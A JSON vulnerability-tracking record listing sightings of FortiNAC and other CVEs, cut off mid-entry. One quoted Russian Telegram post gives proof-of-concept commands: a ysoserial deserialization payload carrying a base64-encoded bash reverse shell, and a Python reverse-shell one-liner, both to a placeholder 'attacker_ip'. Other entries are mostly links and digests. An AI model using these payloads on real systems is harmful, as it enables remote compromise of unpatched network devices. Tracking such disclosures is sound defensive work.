{"vulnerability": "CVE-2023-3329", "sightings": [{"uuid": "93d7765b-593f-4514-8c7c-02b0ba78ed4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_10/2023", "content": "", "creation_timestamp": "2023-06-26T06:59:26.000000Z"}, {"uuid": "86cbda62-b6e6-448d-9ca7-71682268b026", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1053", "content": "", "creation_timestamp": "2023-06-26T04:00:00.000000Z"}, {"uuid": "122b13b5-f730-44dc-8223-861f3803d458", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "published-proof-of-concept", "source": "https://t.me/purple_medved/50", "content": "\u0415\u0436\u0435\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0430\u044f \u0440\u0443\u0431\u0440\u0438\u043a\u0430 \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Fortinet\ud83d\ude0e\n\n\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e 2 \u043d\u043e\u0432\u044b\u0445 RCE \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u0438 FortiNAC, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u0435\u0442\u0435\u0432\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0442\u044c \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0443\u0433\u0440\u043e\u0437\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\ud83d\ude01 \n\nCVE-2023-33299 (Untrusted Deserialization) \n\u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u043c\u0435\u0442\u043e\u0434 \u043a\u043b\u0430\u0441\u0441\u0430 com.bsc.server.Yams.SSLSocketHandler.SSLSocketHandler \u043d\u0430 tcp/1050 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f nac \n\u2699\ufe0f POC:\njava -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 \"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9hdHRhY2tlcl9pcC8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}\" | ncat --ssl vuln_ip 1050\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438: \u041f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u0441 \u0432\u0435\u0440\u0441\u0438\u0438 9.4.2\n\nCVE-2023-33300 (Command Injection)\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 XXE \u0432 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442 CommandObject com.bsc.server.CampusManager.CommandObject.CommandObject(String xml) \u043d\u0430 tcp/5555 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u0435\u0442\u043e\u0434\u0430 commandVector \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c ALLOWED_REMOTE_CMDS=installAgentPackage,configApache,install-bin \u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root \u0438\u0437-\u0437\u0430 \u043c\u0438\u0441\u043a\u043e\u043d\u0444\u0438\u0433\u0430 sudo ssh, \u043f\u0440\u0438 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u0438 \u043d\u043e\u0432\u043e\u0433\u043e \u0430\u0433\u0435\u043d\u0442\u0430 \n\u2699\ufe0f POC:\n\nssh -E installAgentPackage root@localhost\n\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker_ip\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'\n\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438: \u041f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 9.4.3\n\n#CVE-2023-33299 #CVE-2023-33300 #RCE #FortiNAC", "creation_timestamp": "2023-06-22T12:39:06.000000Z"}, {"uuid": "c7a3bc34-fe65-4ea6-8abc-023f5de03561", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "https://t.me/kasraone_com/403", "content": "\ud83d\udd34 \u062e\u0628\u0631 \n\n\u0647\u0634\u062f\u0627\u0631 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0641\u0648\u0631\u06cc! \u0634\u0631\u06a9\u062a \u0641\u0648\u0631\u062a\u06cc\u0646\u062a \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc\u200c\u0647\u0627\u06cc \u0641\u0648\u0631\u06cc \u0631\u0627 \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u06cc\u06a9 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u062d\u0631\u0627\u0646\u06cc (CVE-2023-33299) \u062f\u0631 \u0641\u0648\u0631\u062a\u06cc\u0646\u06a9 \u0627\u0631\u0627\u0626\u0647 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0627\u0639\u062b \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u062f\u0631 \u0634\u0628\u06a9\u0647\u200c\u0647\u0627 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0628\u0631\u0627\u06cc \u06a9\u0633\u0628 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u0628\u0647 \u0644\u06cc\u0646\u06a9 \u0632\u06cc\u0631 \u0645\u0631\u0627\u062c\u0639\u0647 \u06a9\u0646\u06cc\u062f: \n\n\nhttps://thehackernews.com/2023/06/new-fortinets-fortinac-vulnerability.html. \n\n\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u062a\u0632\u0631\u06cc\u0642 SQL \u062f\u0631 \u0698\u0646\u062a\u0648 \u0633\u0648\u06a9\u0648 \u067e\u06cc\u062f\u0627 \u0634\u062f\u0647 \u0627\u0633\u062a! \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0646\u0642\u0635\u200c\u0647\u0627 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0645\u0646\u062c\u0631 \u0628\u0647 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u062f\u0631 \u0633\u0627\u0645\u0627\u0646\u0647\u200c\u0647\u0627\u06cc \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0634\u0648\u062f. \u062c\u0632\u0626\u06cc\u0627\u062a \u0631\u0627 \u062f\u0631 \u0644\u06cc\u0646\u06a9 \u0632\u06cc\u0631 \u0628\u0634\u0646\u0627\u0633\u06cc\u062f: \n\n\nhttps://thehackernews.com/2023/06/critical-sql-injection-flaw", "creation_timestamp": "2023-07-24T11:33:11.000000Z"}, {"uuid": "8437c565-1a6f-483a-96ff-564d55e890fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/j189Td-iJJysThGBrH7jBgw3oARrp_C-g06zkKBHD0B_7Jg", "content": "", "creation_timestamp": "2024-07-13T17:07:18.000000Z"}, {"uuid": "39ef4890-a9e3-4bc7-bde9-ab9c6bf6a1b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "https://t.me/kasperskyb2b/715", "content": "\ud83d\udc68\u200d\ud83d\udcbb \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT  \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83c\udf4f \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430 TriangleDB \u0438\u0437 \u0430\u0442\u0430\u043a\u0438 #iOStriangulation \u043d\u0430 Securelist. \n\u041d\u0430 \u043d\u0435\u0434\u0435\u043b\u0435 Apple \u0437\u0430\u043a\u0440\u044b\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043f\u0440\u0438\u043c\u0435\u043d\u0451\u043d\u043d\u044b\u0445 \u0432 \u044d\u0442\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445. \n\n\u0420\u0430\u0437\u0431\u043e\u0440 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u043e\u0432\u043e\u0439 \u0432\u0430\u0440\u0438\u0430\u0446\u0438\u0438 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a\u0430 Lockbit Green. \u041f\u0440\u043e\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043d\u0430\u0441\u043b\u0435\u0434\u0438\u0435 \u043a\u043e\u0434\u0430 Conti, \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u043c\u043d\u043e\u0433\u043e\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435\u043d\u043d\u043e\u0441\u0442\u044c. \u0421\u0440\u0435\u0434\u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0445 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440 \u0435\u0441\u0442\u044c Apple M1. \ud83d\ude0f\n\n\ud83d\udc3c \u041d\u043e\u0432\u043e\u0441\u0442\u0438 \u0438\u0437 \u0410\u0437\u0438\u0438: APT Mustang Panda/Camaro Dragon \u0438\u0437\u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0430 \u0441\u0430\u043c\u043e\u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0439\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 Wisprider/HopperTick. \u041c\u0435\u0434\u0438\u0446\u0438\u043d\u0441\u043a\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0431\u044b\u043b\u0438 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u044b \u0447\u0435\u0440\u0435\u0437 \u0444\u043b\u0435\u0448\u043a\u0438. \u0420\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u043f\u0440\u0438 \u0442\u0430\u043a\u043e\u043c \u043f\u043e\u0434\u0445\u043e\u0434\u0435 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f, \u0438 \u0436\u0435\u0440\u0442\u0432\u044b \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0432 \u0417\u0430\u043f\u0430\u0434\u043d\u043e\u0439 \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0420\u043e\u0441\u0441\u0438\u0438. \n\n\u0420\u0430\u0437\u0431\u043e\u0440 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u0430 \u0441 \u0433\u043e\u0432\u043e\u0440\u044f\u0449\u0438\u043c \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c RDPcredentialstealer. \n\n\ud83c\udf10 APT15, \u043e\u0434\u043d\u0430 \u0438\u0437 \u0441\u0442\u0430\u0440\u0435\u0439\u0448\u0438\u0445 \u0433\u0440\u0443\u043f\u043f \u0441 \u0448\u0438\u0440\u043e\u043a\u0438\u043c \u0441\u043f\u0435\u043a\u0442\u0440\u043e\u043c \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u0438\u0445 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432, \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0430 \u0441\u0432\u043e\u0439 \u0431\u044d\u043a\u0434\u043e\u0440 Ketrican. \u041d\u043e\u0432\u043e\u0435 \u0438\u0437\u0434\u0430\u043d\u0438\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Graphican, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u0431\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u043a Microsoft Graph API \u0438 OneDrive \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438. \n\n\u0420\u0430\u0437\u0432\u0438\u0442\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440 \u0434\u043b\u044f macOS \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Jokerspy \u0431\u044b\u043b \u043d\u0430\u0439\u0434\u0435\u043d \u0432 \u0441\u0435\u0442\u044f\u0445 \u0444\u0438\u043d\u0442\u0435\u0445-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439. \n\n\ud83c\udfea \u041d\u0435 APT, \u043d\u043e \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e - CVE-2023-33299 \u0432 FortiNAC (CVSS 9,6) \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a RCE. \n\n#\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2023-06-26T09:43:51.000000Z"}, {"uuid": "b60c68a1-9519-4107-a92c-76e77dec258c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/zU_SkzYgEICuvNkV4oYktZ8eoadjubHdwYZmlXuwXXbL", "content": "", "creation_timestamp": "2023-10-22T17:34:54.000000Z"}, {"uuid": "0da6af60-2a58-4e03-b0cc-1088ceeb06a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "https://t.me/LockBitChannels/40322", "content": "cve-2023-33297\nbitcoin botnet ddos attack\n\n\u0412\u0438\u0434\u0435\u043e + \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435", "creation_timestamp": "2024-09-11T13:43:11.000000Z"}, {"uuid": "10690034-172b-49f6-ba85-e1e115c21a4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/WzxSI1_ToslsvKHI7qd86S9EL7vBRRno5J4pm0bXA9HA1rE", "content": "", "creation_timestamp": "2024-07-13T01:34:04.000000Z"}, {"uuid": "ac2cdcf3-32f9-414c-a4cc-358a4fa330d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "https://t.me/ZeroEthical_Course/481", "content": "cve-2023-33297\nbitcoin botnet ddos attack\n\nVideo + opinion\n\n#bonus", "creation_timestamp": "2024-06-13T02:15:05.000000Z"}, {"uuid": "2f0e6353-b5db-46e4-a62c-00b1401ebdc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/ljpHmQPTB4jnYSoh29rbrxGAjoeUYTDk5nqUn7nROqccihHt", "content": "", "creation_timestamp": "2025-01-13T00:35:36.000000Z"}, {"uuid": "62c09364-1e18-46fc-9b64-b1bf43ea60d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/K9DZCjY_tqgLWFrFtVxpaPVjI-s4_FPmOxTaEaFtOTEOUdE", "content": "", "creation_timestamp": "2024-07-13T01:34:03.000000Z"}, {"uuid": "6fc17eba-f180-4be4-8077-c24d86dac827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/HhGOYns9Rg7E8_88NTwWDUV0xYFv6yqUEVttPymBq5Mq2VzN", "content": "", "creation_timestamp": "2024-12-20T10:39:20.000000Z"}, {"uuid": "66aeaaf4-7b0a-45e4-8656-bc8668390b3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/n6L8l_TyrEJAsRMTCJvfgKRi4GtZCsOURZu8BHSAdSU_vHzv", "content": "", "creation_timestamp": "2024-11-12T01:17:04.000000Z"}, {"uuid": "a74ad221-5c24-4c0c-bb61-d58903dc8c07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/ISNC9_UbdNwF4fqz2EgbEmeX7Tto5o2nZRNcH8nAJk_HBHX2", "content": "", "creation_timestamp": "2024-10-29T10:20:16.000000Z"}, {"uuid": "85636b91-8f53-49b9-99ed-e6e0db55985e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/FQTIoTjbM20QcpNv8EQBff4KEaqhhHJqAYPCS26RJ_xGfy0", "content": "", "creation_timestamp": "2024-09-11T13:42:39.000000Z"}, {"uuid": "8431d85b-7999-401e-b924-52e9796a5429", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/RqV993UzSPej6esqb0fhJ1kLx7ULuG48nb9EJWPTHgnkX5c", "content": "", "creation_timestamp": "2024-07-13T17:07:38.000000Z"}, {"uuid": "7f894794-dac5-4c6f-af5c-bb9289b0911a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/U34ZORj7o98z0iXr8QW8dnsTrSQooa3tMkhyiHMoKllI4KLq", "content": "", "creation_timestamp": "2025-01-07T06:14:40.000000Z"}, {"uuid": "533f9741-73fb-4ac4-abf5-ce6356bdc6c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "Telegram/NQSRZWSFHbc17W0HYQ-mh09PYzapTPk0ElHOhQgCdyTAMDc", "content": "", "creation_timestamp": "2023-06-28T15:51:34.000000Z"}, {"uuid": "f30a89da-e69b-4166-8c47-41b980239110", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/KYhbkf_GNQfNdUWpRCeXPYIsdJP7V5n9wfRk4NiDJagkVhU", "content": "", "creation_timestamp": "2024-07-13T17:07:39.000000Z"}, {"uuid": "50881bd5-a21e-4ca5-9066-57f4e514a8b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/sM5TQ8CUzP9tn3OF_AUNmekYEgfJt6r0GFsmpbRw-b0V2u8w", "content": "", "creation_timestamp": "2024-12-20T10:39:16.000000Z"}, {"uuid": "e211b6b3-e780-4cab-9e6d-824bf0ced05a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-3329", "type": "seen", "source": "https://t.me/arpsyndicate/2383", "content": "#ExploitObserverAlert\n\nCVE-2023-3329\n\nDESCRIPTION: Exploit Observer has 1 entries related to CVE-2023-3329. SpiderControl SCADA Webserver versions 2.08 and prior are vulnerable to path traversal. An attacker with administrative privileges could overwrite files on the webserver using the HMI's upload file feature. This could create size zero files anywhere on the webserver, potentially overwriting system files and creating a denial-of-service condition.\n\nFIRST-EPSS: 0.000460000\nNVD-IS: 5.2\nNVD-ES: 1.2", "creation_timestamp": "2024-01-03T23:33:41.000000Z"}, {"uuid": "abd05db6-b59c-40be-bb1a-f97e23f9f2d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/zV1knXrqoO0l2zt9kf050wWq4pEbPrKcgca2H7ho2p2_i9we", "content": "", "creation_timestamp": "2025-01-13T00:35:32.000000Z"}, {"uuid": "e8c97331-5d1d-4e9c-b6b4-2e75d2aa39b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "Telegram/_lpnM-fdjT6dmG2ejmNuglnvvdz5_MKetumlzJ3Q6hgi7g", "content": "", "creation_timestamp": "2023-06-27T09:23:14.000000Z"}, {"uuid": "a285e8d8-4751-4c0c-bacc-71f4b12dd2b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/Fzc_hN_l_m2LIRysNTIE_xcbisI0bld1MHS4gT6VsKgD04Nu", "content": "", "creation_timestamp": "2024-11-12T01:17:06.000000Z"}, {"uuid": "87859b9a-6aa7-44ee-9b7a-d068e6a4d97a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/Lmy07SOeUeqBb_rS0rF2IxcPYBykTTUE8NzzG2qJu90y1JnA", "content": "", "creation_timestamp": "2024-10-29T10:20:16.000000Z"}, {"uuid": "a4e8bd66-4f4c-4b56-9f2c-6b4c11b9561d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/gLl0kc3zpSLtJ09_FhwpBtaFxxOTrnXT_g8yFBkpipZuiKtJ", "content": "", "creation_timestamp": "2025-01-07T06:14:37.000000Z"}, {"uuid": "85a19dd1-e5ed-4636-87a0-0f1528846d7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/W4KABxFC2rNW1tLJ6sJW7p0wA9qMDqj3lFS3_OAgOUyA2mM", "content": "", "creation_timestamp": "2024-07-13T01:34:04.000000Z"}, {"uuid": "a707e67d-15e4-4e2a-8c00-cadc06091d8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "Telegram/K55eQ_xJeSQSaQmmVo5TMAR3oH7gKmG0aoYjWecGBhzZkFm6", "content": "", "creation_timestamp": "2025-01-19T06:00:34.000000Z"}, {"uuid": "6bf01e20-50ee-44d7-9009-749e8b373912", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "https://t.me/AnonymousEgypt/29086", "content": "cve-2023-33297\nbitcoin botnet ddos attack\n\n\u0412\u0438\u0434\u0435\u043e + \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435", "creation_timestamp": "2024-09-11T13:42:29.000000Z"}, {"uuid": "93f4033e-93e0-4915-9836-e35f193df19b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "https://t.me/killnet_reservs/8565", "content": "cve-2023-33297\nbitcoin botnet ddos attack\n\n\u0412\u0438\u0434\u0435\u043e + \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435\n\n#bonus", "creation_timestamp": "2024-06-12T14:11:12.000000Z"}, {"uuid": "b925088d-bea4-4656-8693-7cf6c995fb07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": 